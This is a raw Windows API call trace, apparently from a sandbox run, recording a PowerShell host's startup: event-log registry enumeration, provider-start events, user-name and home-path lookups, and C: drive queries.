	[0204.137] RegOpenKeyExW (in: hKey=0x324, lpSubKey="PowerShell", ulOptions=0x0, samDesired=0x20019, phkResult=0x13d408 | out: phkResult=0x13d408*=0x0) returned 0x2
	[0204.137] RegOpenKeyExW (in: hKey=0x30c, lpSubKey="Internet Explorer", ulOptions=0x0, samDesired=0x20019, phkResult=0x13d408 | out: phkResult=0x13d408*=0x32c) returned 0x0
	[0204.137] RegOpenKeyExW (in: hKey=0x32c, lpSubKey="PowerShell", ulOptions=0x0, samDesired=0x20019, phkResult=0x13d408 | out: phkResult=0x13d408*=0x0) returned 0x2
	[0204.137] RegOpenKeyExW (in: hKey=0x30c, lpSubKey="Key Management Service", ulOptions=0x0, samDesired=0x20019, phkResult=0x13d408 | out: phkResult=0x13d408*=0x330) returned 0x0
	[0204.137] RegOpenKeyExW (in: hKey=0x330, lpSubKey="PowerShell", ulOptions=0x0, samDesired=0x20019, phkResult=0x13d408 | out: phkResult=0x13d408*=0x0) returned 0x2
	[0204.138] RegOpenKeyExW (in: hKey=0x30c, lpSubKey="Media Center", ulOptions=0x0, samDesired=0x20019, phkResult=0x13d408 | out: phkResult=0x13d408*=0x334) returned 0x0
	[0204.138] RegOpenKeyExW (in: hKey=0x334, lpSubKey="PowerShell", ulOptions=0x0, samDesired=0x20019, phkResult=0x13d408 | out: phkResult=0x13d408*=0x0) returned 0x2
	[0204.138] RegOpenKeyExW (in: hKey=0x30c, lpSubKey="OAlerts", ulOptions=0x0, samDesired=0x20019, phkResult=0x13d408 | out: phkResult=0x13d408*=0x338) returned 0x0
	[0204.138] RegOpenKeyExW (in: hKey=0x338, lpSubKey="PowerShell", ulOptions=0x0, samDesired=0x20019, phkResult=0x13d408 | out: phkResult=0x13d408*=0x0) returned 0x2
	[0204.138] RegOpenKeyExW (in: hKey=0x30c, lpSubKey="Security", ulOptions=0x0, samDesired=0x20019, phkResult=0x13d408 | out: phkResult=0x13d408*=0x0) returned 0x5
	[0204.151] RegOpenKeyExW (in: hKey=0x30c, lpSubKey="System", ulOptions=0x0, samDesired=0x20019, phkResult=0x13d408 | out: phkResult=0x13d408*=0x33c) returned 0x0
	[0204.151] RegOpenKeyExW (in: hKey=0x33c, lpSubKey="PowerShell", ulOptions=0x0, samDesired=0x20019, phkResult=0x13d408 | out: phkResult=0x13d408*=0x0) returned 0x2
	[0204.152] RegOpenKeyExW (in: hKey=0x30c, lpSubKey="Windows PowerShell", ulOptions=0x0, samDesired=0x20019, phkResult=0x13d408 | out: phkResult=0x13d408*=0x340) returned 0x0
	[0204.152] RegOpenKeyExW (in: hKey=0x340, lpSubKey="PowerShell", ulOptions=0x0, samDesired=0x20019, phkResult=0x13d408 | out: phkResult=0x13d408*=0x344) returned 0x0
	[0204.152] RegCloseKey (hKey=0x344) returned 0x0
	[0204.152] RegCloseKey (hKey=0x30c) returned 0x0
	[0204.153] RegCloseKey (hKey=0x340) returned 0x0
	[0204.699] CoTaskMemAlloc (cb=0x804) returned 0x1b921f40
	[0204.699] GetUserNameExW (in: NameFormat=0x2, lpNameBuffer=0x1b921f40, nSize=0x13d618 | out: lpNameBuffer="YKYD69Q\\aETAdzjz", nSize=0x13d618) returned 0x1
	[0204.700] CoTaskMemFree (pv=0x1b921f40) 
	[0204.701] CoTaskMemAlloc (cb=0x204) returned 0x1f89c0
	[0204.701] GetUserNameW (in: lpBuffer=0x1f89c0, pcbBuffer=0x13d658 | out: lpBuffer="aETAdzjz", pcbBuffer=0x13d658) returned 1
	[0204.701] CoTaskMemFree (pv=0x1f89c0) 
	[0212.556] RegOpenKeyExW (in: hKey=0xffffffff80000002, lpSubKey="SYSTEM\\CurrentControlSet\\Services\\EventLog", ulOptions=0x0, samDesired=0x20019, phkResult=0x13d358 | out: phkResult=0x13d358*=0x320) returned 0x0
	[0212.556] RegQueryInfoKeyW (in: hKey=0x320, lpClass=0x0, lpcchClass=0x0, lpReserved=0x0, lpcSubKeys=0x13d2cc, lpcbMaxSubKeyLen=0x0, lpcbMaxClassLen=0x0, lpcValues=0x13d2c8, lpcbMaxValueNameLen=0x0, lpcbMaxValueLen=0x0, lpcbSecurityDescriptor=0x0, lpftLastWriteTime=0x0 | out: lpClass=0x0, lpcchClass=0x0, lpcSubKeys=0x13d2cc*=0x9, lpcbMaxSubKeyLen=0x0, lpcbMaxClassLen=0x0, lpcValues=0x13d2c8*=0x10, lpcbMaxValueNameLen=0x0, lpcbMaxValueLen=0x0, lpcbSecurityDescriptor=0x0, lpftLastWriteTime=0x0) returned 0x0
	[0212.556] CoTaskMemFree (pv=0x0) 
	[0212.556] CoTaskMemAlloc (cb=0x204) returned 0x1f89c0
	[0212.556] RegEnumKeyExW (in: hKey=0x320, dwIndex=0x0, lpName=0x1f89c0, lpcchName=0x13d358, lpReserved=0x0, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0 | out: lpName="Application", lpcchName=0x13d358, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0) returned 0x0
	[0212.556] CoTaskMemFree (pv=0x1f89c0) 
	[0212.556] CoTaskMemFree (pv=0x0) 
	[0212.556] CoTaskMemAlloc (cb=0x204) returned 0x1f89c0
	[0212.556] RegEnumKeyExW (in: hKey=0x320, dwIndex=0x1, lpName=0x1f89c0, lpcchName=0x13d358, lpReserved=0x0, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0 | out: lpName="HardwareEvents", lpcchName=0x13d358, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0) returned 0x0
	[0212.556] CoTaskMemFree (pv=0x1f89c0) 
	[0212.556] CoTaskMemFree (pv=0x0) 
	[0212.556] CoTaskMemAlloc (cb=0x204) returned 0x1f89c0
	[0212.556] RegEnumKeyExW (in: hKey=0x320, dwIndex=0x2, lpName=0x1f89c0, lpcchName=0x13d358, lpReserved=0x0, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0 | out: lpName="Internet Explorer", lpcchName=0x13d358, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0) returned 0x0
	[0212.556] CoTaskMemFree (pv=0x1f89c0) 
	[0212.556] CoTaskMemFree (pv=0x0) 
	[0212.556] CoTaskMemAlloc (cb=0x204) returned 0x1f89c0
	[0212.557] RegEnumKeyExW (in: hKey=0x320, dwIndex=0x3, lpName=0x1f89c0, lpcchName=0x13d358, lpReserved=0x0, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0 | out: lpName="Key Management Service", lpcchName=0x13d358, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0) returned 0x0
	[0212.557] CoTaskMemFree (pv=0x1f89c0) 
	[0212.557] CoTaskMemFree (pv=0x0) 
	[0212.557] CoTaskMemAlloc (cb=0x204) returned 0x1f89c0
	[0212.557] RegEnumKeyExW (in: hKey=0x320, dwIndex=0x4, lpName=0x1f89c0, lpcchName=0x13d358, lpReserved=0x0, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0 | out: lpName="Media Center", lpcchName=0x13d358, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0) returned 0x0
	[0212.557] CoTaskMemFree (pv=0x1f89c0) 
	[0212.557] CoTaskMemFree (pv=0x0) 
	[0212.557] CoTaskMemAlloc (cb=0x204) returned 0x1f89c0
	[0212.557] RegEnumKeyExW (in: hKey=0x320, dwIndex=0x5, lpName=0x1f89c0, lpcchName=0x13d358, lpReserved=0x0, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0 | out: lpName="OAlerts", lpcchName=0x13d358, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0) returned 0x0
	[0212.557] CoTaskMemFree (pv=0x1f89c0) 
	[0212.557] CoTaskMemFree (pv=0x0) 
	[0212.557] CoTaskMemAlloc (cb=0x204) returned 0x1f89c0
	[0212.557] RegEnumKeyExW (in: hKey=0x320, dwIndex=0x6, lpName=0x1f89c0, lpcchName=0x13d358, lpReserved=0x0, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0 | out: lpName="Security", lpcchName=0x13d358, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0) returned 0x0
	[0212.557] CoTaskMemFree (pv=0x1f89c0) 
	[0212.557] CoTaskMemFree (pv=0x0) 
	[0212.557] CoTaskMemAlloc (cb=0x204) returned 0x1f89c0
	[0212.557] RegEnumKeyExW (in: hKey=0x320, dwIndex=0x7, lpName=0x1f89c0, lpcchName=0x13d358, lpReserved=0x0, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0 | out: lpName="System", lpcchName=0x13d358, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0) returned 0x0
	[0212.557] CoTaskMemFree (pv=0x1f89c0) 
	[0212.557] CoTaskMemFree (pv=0x0) 
	[0212.557] CoTaskMemAlloc (cb=0x204) returned 0x1f89c0
	[0212.557] RegEnumKeyExW (in: hKey=0x320, dwIndex=0x8, lpName=0x1f89c0, lpcchName=0x13d358, lpReserved=0x0, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0 | out: lpName="Windows PowerShell", lpcchName=0x13d358, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0) returned 0x0
	[0212.557] CoTaskMemFree (pv=0x1f89c0) 
	[0212.557] CoTaskMemFree (pv=0x0) 
	[0212.557] RegOpenKeyExW (in: hKey=0x320, lpSubKey="Application", ulOptions=0x0, samDesired=0x20019, phkResult=0x13d3b8 | out: phkResult=0x13d3b8*=0x328) returned 0x0
	[0212.557] RegOpenKeyExW (in: hKey=0x328, lpSubKey="PowerShell", ulOptions=0x0, samDesired=0x20019, phkResult=0x13d3b8 | out: phkResult=0x13d3b8*=0x0) returned 0x2
	[0212.557] RegOpenKeyExW (in: hKey=0x320, lpSubKey="HardwareEvents", ulOptions=0x0, samDesired=0x20019, phkResult=0x13d3b8 | out: phkResult=0x13d3b8*=0x348) returned 0x0
	[0212.558] RegOpenKeyExW (in: hKey=0x348, lpSubKey="PowerShell", ulOptions=0x0, samDesired=0x20019, phkResult=0x13d3b8 | out: phkResult=0x13d3b8*=0x0) returned 0x2
	[0212.558] RegOpenKeyExW (in: hKey=0x320, lpSubKey="Internet Explorer", ulOptions=0x0, samDesired=0x20019, phkResult=0x13d3b8 | out: phkResult=0x13d3b8*=0x34c) returned 0x0
	[0212.558] RegOpenKeyExW (in: hKey=0x34c, lpSubKey="PowerShell", ulOptions=0x0, samDesired=0x20019, phkResult=0x13d3b8 | out: phkResult=0x13d3b8*=0x0) returned 0x2
	[0212.558] RegOpenKeyExW (in: hKey=0x320, lpSubKey="Key Management Service", ulOptions=0x0, samDesired=0x20019, phkResult=0x13d3b8 | out: phkResult=0x13d3b8*=0x350) returned 0x0
	[0212.558] RegOpenKeyExW (in: hKey=0x350, lpSubKey="PowerShell", ulOptions=0x0, samDesired=0x20019, phkResult=0x13d3b8 | out: phkResult=0x13d3b8*=0x0) returned 0x2
	[0212.558] RegOpenKeyExW (in: hKey=0x320, lpSubKey="Media Center", ulOptions=0x0, samDesired=0x20019, phkResult=0x13d3b8 | out: phkResult=0x13d3b8*=0x354) returned 0x0
	[0212.558] RegOpenKeyExW (in: hKey=0x354, lpSubKey="PowerShell", ulOptions=0x0, samDesired=0x20019, phkResult=0x13d3b8 | out: phkResult=0x13d3b8*=0x0) returned 0x2
	[0212.558] RegOpenKeyExW (in: hKey=0x320, lpSubKey="OAlerts", ulOptions=0x0, samDesired=0x20019, phkResult=0x13d3b8 | out: phkResult=0x13d3b8*=0x358) returned 0x0
	[0212.558] RegOpenKeyExW (in: hKey=0x358, lpSubKey="PowerShell", ulOptions=0x0, samDesired=0x20019, phkResult=0x13d3b8 | out: phkResult=0x13d3b8*=0x0) returned 0x2
	[0212.558] RegOpenKeyExW (in: hKey=0x320, lpSubKey="Security", ulOptions=0x0, samDesired=0x20019, phkResult=0x13d3b8 | out: phkResult=0x13d3b8*=0x0) returned 0x5
	[0213.518] RegOpenKeyExW (in: hKey=0x37c, lpSubKey="PowerShell", ulOptions=0x0, samDesired=0x20019, phkResult=0x13d3b8 | out: phkResult=0x13d3b8*=0x320) returned 0x0
	[0213.531] RegisterEventSourceW (lpUNCServerName=".", lpSourceName="PowerShell") returned 0x1ba90008
	[0213.789] ReportEventW (hEventLog=0x1ba90008, wType=0x4, wCategory=0x6, dwEventID=0x258, lpUserSid=0x0, wNumStrings=0x3, dwDataSize=0x0, lpStrings=0x2eb0320*="WSMan", lpRawData=0x2eb0090) returned 1
	[0213.798] CoTaskMemAlloc (cb=0x104) returned 0x215590
	[0213.798] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x215590, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0213.798] CoTaskMemFree (pv=0x215590) 
	[0213.800] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x13cec0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0213.800] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x13ce10, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0213.800] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x13ce10, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0213.801] CoTaskMemAlloc (cb=0x804) returned 0x1b921f40
	[0213.801] GetUserNameExW (in: NameFormat=0x2, lpNameBuffer=0x1b921f40, nSize=0x13d618 | out: lpNameBuffer="YKYD69Q\\aETAdzjz", nSize=0x13d618) returned 0x1
	[0213.801] CoTaskMemFree (pv=0x1b921f40) 
	[0213.801] CoTaskMemAlloc (cb=0x204) returned 0x1f89c0
	[0213.801] GetUserNameW (in: lpBuffer=0x1f89c0, pcbBuffer=0x13d658 | out: lpBuffer="aETAdzjz", pcbBuffer=0x13d658) returned 1
	[0213.801] CoTaskMemFree (pv=0x1f89c0) 
	[0213.801] ReportEventW (hEventLog=0x1ba90008, wType=0x4, wCategory=0x6, dwEventID=0x258, lpUserSid=0x0, wNumStrings=0x3, dwDataSize=0x0, lpStrings=0x2eb5cb0*="Alias", lpRawData=0x2eb5a40) returned 1
	[0213.815] CoTaskMemAlloc (cb=0x104) returned 0x215590
	[0213.815] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x215590, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0213.815] CoTaskMemFree (pv=0x215590) 
	[0213.816] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x13cec0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0213.816] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x13ce10, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0213.816] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x13ce10, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0213.817] CoTaskMemAlloc (cb=0x804) returned 0x1b921f40
	[0213.817] GetUserNameExW (in: NameFormat=0x2, lpNameBuffer=0x1b921f40, nSize=0x13d618 | out: lpNameBuffer="YKYD69Q\\aETAdzjz", nSize=0x13d618) returned 0x1
	[0213.817] CoTaskMemFree (pv=0x1b921f40) 
	[0213.817] CoTaskMemAlloc (cb=0x204) returned 0x1f89c0
	[0213.817] GetUserNameW (in: lpBuffer=0x1f89c0, pcbBuffer=0x13d658 | out: lpBuffer="aETAdzjz", pcbBuffer=0x13d658) returned 1
	[0213.817] CoTaskMemFree (pv=0x1f89c0) 
	[0213.817] ReportEventW (hEventLog=0x1ba90008, wType=0x4, wCategory=0x6, dwEventID=0x258, lpUserSid=0x0, wNumStrings=0x3, dwDataSize=0x0, lpStrings=0x2ebb258*="Environment", lpRawData=0x2ebafe8) returned 1
	[0213.837] CoTaskMemAlloc (cb=0x104) returned 0x215590
	[0213.837] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x215590, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0213.838] CoTaskMemFree (pv=0x215590) 
	[0213.838] CoTaskMemAlloc (cb=0x104) returned 0x215590
	[0213.838] GetEnvironmentVariableW (in: lpName="HOMEDRIVE", lpBuffer=0x215590, nSize=0x80 | out: lpBuffer="C:") returned 0x2
	[0213.839] CoTaskMemFree (pv=0x215590) 
	[0213.839] CoTaskMemAlloc (cb=0x104) returned 0x215590
	[0213.839] GetEnvironmentVariableW (in: lpName="HOMEPATH", lpBuffer=0x215590, nSize=0x80 | out: lpBuffer="\\Users\\aETAdzjz") returned 0xf
	[0213.839] CoTaskMemFree (pv=0x215590) 
	[0213.839] GetFullPathNameW (in: lpFileName="C:\\Users\\aETAdzjz", nBufferLength=0x105, lpBuffer=0x13d1c0, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\aETAdzjz", lpFilePart=0x0) returned 0x11
	[0213.839] SetErrorMode (uMode=0x1) returned 0x1
	[0213.839] GetFileAttributesExW (in: lpFileName="C:\\Users\\aETAdzjz" (normalized: "c:\\users\\aetadzjz"), fInfoLevelId=0x0, lpFileInformation=0x13d3d0 | out: lpFileInformation=0x13d3d0*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x2329edc0, ftCreationTime.dwHighDateTime=0x1d2f180, ftLastAccessTime.dwLowDateTime=0x7d929a80, ftLastAccessTime.dwHighDateTime=0x1d2f182, ftLastWriteTime.dwLowDateTime=0x7d929a80, ftLastWriteTime.dwHighDateTime=0x1d2f182, nFileSizeHigh=0x0, nFileSizeLow=0x2000)) returned 1
	[0213.839] SetErrorMode (uMode=0x1) returned 0x1
	[0213.840] GetLogicalDrives () returned 0x4
	[0213.841] GetFullPathNameW (in: lpFileName="C:\\.", nBufferLength=0x105, lpBuffer=0x13cf30, lpFilePart=0x0 | out: lpBuffer="C:\\", lpFilePart=0x0) returned 0x3
	[0213.842] GetDriveTypeW (lpRootPathName="C:\\") returned 0x3
	[0213.842] SetErrorMode (uMode=0x1) returned 0x1
	[0213.843] CoTaskMemAlloc (cb=0x68) returned 0x1b8f9d00
	[0213.843] CoTaskMemAlloc (cb=0x68) returned 0x1b8f9d70
	[0213.843] GetVolumeInformationW (in: lpRootPathName="C:\\", lpVolumeNameBuffer=0x1b8f9d00, nVolumeNameSize=0x32, lpVolumeSerialNumber=0x13d3a0, lpMaximumComponentLength=0x13d39c, lpFileSystemFlags=0x13d398, lpFileSystemNameBuffer=0x1b8f9d70, nFileSystemNameSize=0x32 | out: lpVolumeNameBuffer="SYSTEM", lpVolumeSerialNumber=0x13d3a0*=0x705ba84c, lpMaximumComponentLength=0x13d39c*=0xff, lpFileSystemFlags=0x13d398*=0x3e700ff, lpFileSystemNameBuffer="NTFS") returned 1
	[0213.843] CoTaskMemFree (pv=0x1b8f9d00) 
	[0213.843] CoTaskMemFree (pv=0x1b8f9d70) 
	[0213.843] SetErrorMode (uMode=0x1) returned 0x1
	[0213.843] GetDriveTypeW (lpRootPathName="C:\\") returned 0x3
	[0213.844] GetFullPathNameW (in: lpFileName="C:\\", nBufferLength=0x105, lpBuffer=0x13d0e0, lpFilePart=0x0 | out: lpBuffer="C:\\", lpFilePart=0x0) returned 0x3
	[0213.844] SetErrorMode (uMode=0x1) returned 0x1
	[0213.844] GetFileAttributesExW (in: lpFileName="C:\\" (normalized: "c:"), fInfoLevelId=0x0, lpFileInformation=0x13d340 | out: lpFileInformation=0x13d340*(dwFileAttributes=0x16, ftCreationTime.dwLowDateTime=0x3c0142d0, ftCreationTime.dwHighDateTime=0x1ca042c, ftLastAccessTime.dwLowDateTime=0x6cd47e0, ftLastAccessTime.dwHighDateTime=0x1d337b1, ftLastWriteTime.dwLowDateTime=0x6cd47e0, ftLastWriteTime.dwHighDateTime=0x1d337b1, nFileSizeHigh=0x0, nFileSizeLow=0x2000)) returned 1
	[0213.844] SetErrorMode (uMode=0x1) returned 0x1
	[0213.844] GetFullPathNameW (in: lpFileName="C:\\", nBufferLength=0x105, lpBuffer=0x13d0e0, lpFilePart=0x0 | out: lpBuffer="C:\\", lpFilePart=0x0) returned 0x3
	[0213.844] GetFullPathNameW (in: lpFileName="C:\\.", nBufferLength=0x105, lpBuffer=0x13cf90, lpFilePart=0x0 | out: lpBuffer="C:\\", lpFilePart=0x0) returned 0x3
	[0213.844] GetDriveTypeW (lpRootPathName="C:\\") returned 0x3
	[0213.845] GetFullPathNameW (in: lpFileName="C:\\.", nBufferLength=0x105, lpBuffer=0x13cec0, lpFilePart=0x0 | out: lpBuffer="C:\\", lpFilePart=0x0) returned 0x3
	[0213.845] GetDriveTypeW (lpRootPathName="C:\\") returned 0x3
	[0213.845] GetFullPathNameW (in: lpFileName="C:\\", nBufferLength=0x105, lpBuffer=0x13cf10, lpFilePart=0x0 | out: lpBuffer="C:\\", lpFilePart=0x0) returned 0x3
	[0213.846] SetErrorMode (uMode=0x1) returned 0x1
	[0213.846] GetFileAttributesExW (in: lpFileName="C:\\" (normalized: "c:"), fInfoLevelId=0x0, lpFileInformation=0x13d170 | out: lpFileInformation=0x13d170*(dwFileAttributes=0x16, ftCreationTime.dwLowDateTime=0x3c0142d0, ftCreationTime.dwHighDateTime=0x1ca042c, ftLastAccessTime.dwLowDateTime=0x6cd47e0, ftLastAccessTime.dwHighDateTime=0x1d337b1, ftLastWriteTime.dwLowDateTime=0x6cd47e0, ftLastWriteTime.dwHighDateTime=0x1d337b1, nFileSizeHigh=0x0, nFileSizeLow=0x2000)) returned 1
	[0213.846] SetErrorMode (uMode=0x1) returned 0x1
	[0213.847] GetFullPathNameW (in: lpFileName="C:\\", nBufferLength=0x105, lpBuffer=0x13cf10, lpFilePart=0x0 | out: lpBuffer="C:\\", lpFilePart=0x0) returned 0x3
	[0213.847] SetErrorMode (uMode=0x1) returned 0x1
	[0213.847] GetFileAttributesExW (in: lpFileName="C:\\" (normalized: "c:"), fInfoLevelId=0x0, lpFileInformation=0x13d170 | out: lpFileInformation=0x13d170*(dwFileAttributes=0x16, ftCreationTime.dwLowDateTime=0x3c0142d0, ftCreationTime.dwHighDateTime=0x1ca042c, ftLastAccessTime.dwLowDateTime=0x6cd47e0, ftLastAccessTime.dwHighDateTime=0x1d337b1, ftLastWriteTime.dwLowDateTime=0x6cd47e0, ftLastWriteTime.dwHighDateTime=0x1d337b1, nFileSizeHigh=0x0, nFileSizeLow=0x2000)) returned 1
	[0213.847] SetErrorMode (uMode=0x1) returned 0x1
	[0213.847] GetFullPathNameW (in: lpFileName="C:\\", nBufferLength=0x105, lpBuffer=0x13cfb0, lpFilePart=0x0 | out: lpBuffer="C:\\", lpFilePart=0x0) returned 0x3
	[0213.847] SetErrorMode (uMode=0x1) returned 0x1
	[0213.847] GetFileAttributesExW (in: lpFileName="C:\\" (normalized: "c:"), fInfoLevelId=0x0, lpFileInformation=0x13d210 | out: lpFileInformation=0x13d210*(dwFileAttributes=0x16, ftCreationTime.dwLowDateTime=0x3c0142d0, ftCreationTime.dwHighDateTime=0x1ca042c, ftLastAccessTime.dwLowDateTime=0x6cd47e0, ftLastAccessTime.dwHighDateTime=0x1d337b1, ftLastWriteTime.dwLowDateTime=0x6cd47e0, ftLastWriteTime.dwHighDateTime=0x1d337b1, nFileSizeHigh=0x0, nFileSizeLow=0x2000)) returned 1
	[0213.848] SetErrorMode (uMode=0x1) returned 0x1
	[0213.848] CoTaskMemAlloc (cb=0x804) returned 0x1b921f40
	[0213.848] GetUserNameExW (in: NameFormat=0x2, lpNameBuffer=0x1b921f40, nSize=0x13d618 | out: lpNameBuffer="YKYD69Q\\aETAdzjz", nSize=0x13d618) returned 0x1
	[0213.848] CoTaskMemFree (pv=0x1b921f40) 
	[0213.848] CoTaskMemAlloc (cb=0x204) returned 0x1f89c0
	[0213.848] GetUserNameW (in: lpBuffer=0x1f89c0, pcbBuffer=0x13d658 | out: lpBuffer="aETAdzjz", pcbBuffer=0x13d658) returned 1
	[0213.848] CoTaskMemFree (pv=0x1f89c0) 
	[0213.849] ReportEventW (hEventLog=0x1ba90008, wType=0x4, wCategory=0x6, dwEventID=0x258, lpUserSid=0x0, wNumStrings=0x3, dwDataSize=0x0, lpStrings=0x2ec22b0*="FileSystem", lpRawData=0x2ec2040) returned 1
	[0213.877] CoTaskMemAlloc (cb=0x104) returned 0x215590
	[0213.877] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x215590, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0213.877] CoTaskMemFree (pv=0x215590) 
	[0213.878] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x13cef0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0213.879] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x13ce40, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0213.879] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x13ce40, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0213.879] CoTaskMemAlloc (cb=0x804) returned 0x1b921f40
	[0213.879] GetUserNameExW (in: NameFormat=0x2, lpNameBuffer=0x1b921f40, nSize=0x13d618 | out: lpNameBuffer="YKYD69Q\\aETAdzjz", nSize=0x13d618) returned 0x1
	[0213.879] CoTaskMemFree (pv=0x1b921f40) 
	[0213.879] CoTaskMemAlloc (cb=0x204) returned 0x1f89c0
	[0213.879] GetUserNameW (in: lpBuffer=0x1f89c0, pcbBuffer=0x13d658 | out: lpBuffer="aETAdzjz", pcbBuffer=0x13d658) returned 1
	[0213.880] CoTaskMemFree (pv=0x1f89c0) 
	[0213.880] ReportEventW (hEventLog=0x1ba90008, wType=0x4, wCategory=0x6, dwEventID=0x258, lpUserSid=0x0, wNumStrings=0x3, dwDataSize=0x0, lpStrings=0x2ec7aa0*="Function", lpRawData=0x2ec7830) returned 1
	[0213.926] CoTaskMemAlloc (cb=0x104) returned 0x215590
	[0213.926] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x215590, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0213.926] CoTaskMemFree (pv=0x215590) 
	[0219.217] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x13cec0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0219.217] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x13ce10, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
